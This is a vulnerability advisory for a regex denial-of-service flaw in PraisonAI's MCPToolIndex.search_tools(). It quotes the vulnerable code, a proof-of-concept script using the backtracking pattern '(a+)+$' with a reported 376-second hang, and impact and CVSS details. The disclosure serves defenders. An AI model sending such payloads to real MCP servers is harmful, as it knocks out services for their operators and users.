CVE-2026-34939

MEDIUM6.5EPSS 0.02%

PraisonAI Has ReDoS via Unvalidated User-Controlled Regex in MCPToolIndex.search_tools()

發布日:2026/4/1修改日:2026/4/6
也稱為:GHSA-8w9j-hc3g-3g7f

描述

### Summary `MCPToolIndex.search_tools()` compiles a caller-supplied string directly as a Python regular expression with no validation, sanitization, or timeout. A crafted regex causes catastrophic backtracking in the `re` engine, blocking the Python thread for hundreds of seconds and causing a complete service outage. ### Details `tool_index.py:365` (source) -> `tool_index.py:368` (sink) ```python # source -- query taken directly from caller, no validation def search_tools(self, query: str) -> List[ToolInfo]: import re # sink -- compiled and applied with no timeout or exception handling pattern = re.compile(query, re.IGNORECASE) for tool in self.get_all_tools(): if pattern.search(tool.name) or pattern.search(tool.hint): matches.append(tool) ``` ### PoC ```python # tested on: praisonai==1.5.87 (source install) # install: pip install -e src/praisonai import sys, time, json sys.path.insert(0, 'src/praisonai') from pathlib import Path mcp_dir = Path.home() / '.praison' / 'mcp' / 'servers' / 'test_server' mcp_dir.mkdir(parents=True, exist_ok=True) (mcp_dir / '_index.json').write_text(json.dumps([ {"name": "a" * 30 + "!", "hint": "a" * 30 + "!", "server": "test_server"} ])) (mcp_dir / '_status.json').write_text(json.dumps({ "server": "test_server", "available": True, "auth_required": False, "last_sync": time.time(), "tool_count": 1, "error": None })) from praisonai.mcp_server.tool_index import MCPToolIndex index = MCPToolIndex() start = time.monotonic() results = index.search_tools("(a+)+$") print(f"Returned in {time.monotonic() - start:.1f}s") # expected output: Returned in 376.0s ``` ### Impact A single crafted query blocks the Python thread for hundreds of seconds, causing a complete service outage for the duration. The MCP server HTTP transport runs without an API key by default, making this reachable by any attacker on the network. Repeated requests sustain the DoS indefinitely.

受影響套件(1)

CVSS 分數

來源版本嚴重程度向量
osvCVSS 3.1MEDIUM6.5CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

參考連結(3)